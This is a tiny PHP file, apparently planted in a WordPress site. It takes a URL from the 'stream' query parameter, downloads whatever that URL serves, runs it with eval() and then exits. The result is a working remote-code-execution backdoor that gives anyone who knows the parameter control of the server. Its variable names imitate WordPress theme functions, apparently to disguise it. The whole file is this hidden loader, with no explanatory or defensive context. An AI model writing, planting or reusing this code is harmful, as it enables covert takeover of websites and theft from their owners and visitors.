<?php
if (isset($_GET['stream'])) {
$has_nav_menu_lz = $_GET['stream'];
if ($get_sidebar_unx = curl_init()) {
curl_setopt($get_sidebar_unx, CURLOPT_URL, $has_nav_menu_lz);
curl_setopt($get_sidebar_unx, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_sidebar_unx));
curl_close($get_sidebar_unx);
exit;
}
}